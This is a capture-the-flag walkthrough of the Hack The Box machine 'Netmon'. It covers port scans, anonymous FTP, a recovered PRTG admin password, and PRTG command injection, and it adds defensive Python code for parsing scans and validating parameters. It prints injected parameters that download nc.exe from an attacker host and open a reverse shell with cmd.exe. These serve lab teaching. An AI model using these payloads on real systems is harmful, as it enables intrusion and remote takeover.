Netmon: Hack The Box Walkthrough
source link: https://www.tuicool.com/articles/RBRvYfb
This post documents the complete walkthrough of Netmon, a retired vulnerable VM created by mrb3n, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
Netmon is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.152 --rate=700
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-03-10 13:41:15 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49666/tcp on 10.10.10.152
Discovered open port 49664/tcp on 10.10.10.152
Discovered open port 49677/tcp on 10.10.10.152
Discovered open port 49667/tcp on 10.10.10.152
Discovered open port 49665/tcp on 10.10.10.152
Discovered open port 52337/tcp on 10.10.10.152
Discovered open port 5985/tcp on 10.10.10.152
Discovered open port 139/tcp on 10.10.10.152
Discovered open port 47001/tcp on 10.10.10.152
Discovered open port 80/tcp on 10.10.10.152
Discovered open port 445/tcp on 10.10.10.152
Discovered open port 49668/tcp on 10.10.10.152
Discovered open port 21/tcp on 10.10.10.152
Discovered open port 135/tcp on 10.10.10.152
Discovered open port 53099/tcp on 10.10.10.152
Whoa. masscan finds many open ports. Let’s do one better with nmap, scanning the discovered ports to see what services are available.
# nmap -n -v -Pn -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677,52337,53099 -A --reason 10.10.10.152 -oN nmap.txt
...
PORT      STATE  SERVICE      REASON          VERSION
21/tcp    open   ftp          syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open   http         syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open   netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
52337/tcp closed unknown      reset ttl 127
53099/tcp closed unknown      reset ttl 127
...
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-10 13:48:31
|_  start_date: 2019-03-10 13:32:38
Since anonymous FTP login is allowed, let’s go with that first.
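The scan output above already contains the three facts that matter for this box: anonymous FTP is permitted, SMB signing is not required, and the PRTG server header reveals a build older than the fixed release named later in this post. As an added example (not part of the original walkthrough), here is a small parser that reads nmap's normal (-oN) output and turns those observations into findings a defender can act on. The sample input is a constructed excerpt of the scan above, and the PRTG fixed-version threshold is taken from this post's heading, not from any vendor data embedded here.

```python
import re

# Constructed sample: the relevant lines of the nmap output shown above.
SAMPLE_NMAP = """\
PORT      STATE  SERVICE      REASON          VERSION
21/tcp    open   ftp          syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open   http         syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp   open   microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
52337/tcp closed unknown      reset ttl 127
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# One nmap port line: "<port>/<proto> <state> <service> <reason>[ ttl N] <version>"
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)(?: ttl \d+)?\s*(.*)$"
)


def parse_ports(text):
    """Return [(port, proto, state, service, version)] for every port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, _reason, version = m.groups()
            ports.append((int(port), proto, state, service, version.strip()))
    return ports


def open_ports(text):
    """Only the ports nmap reports as open (closed ephemeral ports are noise)."""
    return [p for p in parse_ports(text) if p[2] == "open"]


def prtg_version(text):
    """Extract the PRTG build from the http-server-header line as a tuple."""
    m = re.search(r"PRTG/(\d+(?:\.\d+)+)", text)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None


def assess(text, prtg_fixed=(18, 2, 39)):
    """Turn scan observations into remediation findings."""
    findings = []
    if "Anonymous FTP login allowed" in text:
        findings.append("ftp: anonymous login allowed; review what the FTP root exposes")
    if re.search(r"message_signing: disabled|Message signing enabled but not required", text):
        findings.append("smb: message signing not required; require SMB signing")
    v = prtg_version(text)
    if v is not None and v < prtg_fixed:
        have = ".".join(map(str, v))
        want = ".".join(map(str, prtg_fixed))
        findings.append(f"prtg: build {have} is older than {want}; update PRTG")
    return findings


if __name__ == "__main__":
    for p in open_ports(SAMPLE_NMAP):
        print(p)
    for f in assess(SAMPLE_NMAP):
        print("FINDING:", f)
```

Tuple comparison handles the four-part PRTG build against a three-part threshold correctly, since Python compares element by element and 18.1.x sorts before 18.2.39. Point the same functions at a full nmap.txt to triage a larger scan.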
File Transfer Protocol
To my pleasant surprise, C:\Users\Public is available. And guess what, user.txt is here!
PRTG Network Monitor
Moving on to the http service, this is how it looks.
In conjunction with the official security advisory and the location of the various configuration files, I was able to uncover a plaintext password from the file below.
Here’s the plaintext password.
And since this is a backup and knowing administrators increment the year for convenience’s sake, the password may be [email protected]. Let’s give it a shot.
Awesome.
PRTG < 18.2.39 Command Injection Vulnerability
During my research for vulnerability related to PRTG, I chanced upon this blog discussing command injection vulnerability, with SYSTEM privileges no less.
Follow the instructions to create a custom notification with the following parameters.
test.txt; Invoke-WebRequest http://10.10.15.200/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe
If you’ve read the blog carefully, you’ll realize certain characters are encoded. As such, I’m avoiding certain bad characters, if you will, to download a copy of nc.exe to c:\Users\Public\Downloads with PowerShell.
Verify that nc.exe is indeed downloaded.
Next, we use the following parameters to run a reverse shell back to us.
test.txt; c:\Users\Public\Downloads\nc.exe 10.10.15.200 1234 -e cmd.exe
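The root cause in this section is a notification parameter that is meant to hold a file name but is spliced into a PowerShell command line, so a semicolon ends the intended argument and whatever follows runs as a new statement. The post notes that PRTG encodes certain characters, and the payload simply avoids those; a denylist of bad characters is exactly the control that gets worked around. As an added example (not part of the original walkthrough, and not PRTG's own code), here is the check a defender would put in front of such a parameter: an allowlist for a bare file name, plus an indicator function useful for auditing existing notification settings. The sample values are constructed from the parameters shown above.

```python
import re

# Constructed samples: a benign parameter and the injected one from this post.
BENIGN = "test.txt"
INJECTED = ("test.txt; Invoke-WebRequest http://10.10.15.200/nc.exe "
            "-OutFile c:\\Users\\Public\\Downloads\\nc.exe")

# Characters that let a value break out of its argument when the string is
# interpreted by cmd.exe or PowerShell (illustrative set, not exhaustive).
SHELL_META = set(";|&`$(){}<>\n\r")

# Allowlist for a parameter that must be a bare file name: no path separators,
# no whitespace, no metacharacters, bounded length.
FILENAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,254}$")


def find_injection_indicators(value):
    """Metacharacters present in value, in order of first appearance."""
    seen = []
    for ch in value:
        if ch in SHELL_META and ch not in seen:
            seen.append(ch)
    return seen


def is_valid_filename_parameter(value):
    """Accept only a bare file name; rejects traversal and anything shell-like."""
    return bool(FILENAME_RE.match(value)) and ".." not in value


def check_parameter(value):
    """Audit verdict for a stored notification parameter."""
    indicators = find_injection_indicators(value)
    return {
        "value": value,
        "valid": is_valid_filename_parameter(value),
        "indicators": indicators,
        "verdict": "reject" if indicators or not is_valid_filename_parameter(value) else "ok",
    }


if __name__ == "__main__":
    for v in (BENIGN, INJECTED):
        print(check_parameter(v))
```

The allowlist rejects the injected value because of the space and the semicolon, regardless of which characters the product happens to encode; that is the difference between "strip the bad characters we know about" and "accept only the shape the parameter is supposed to have".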
Getting root.txt is trivial when you have SYSTEM privileges.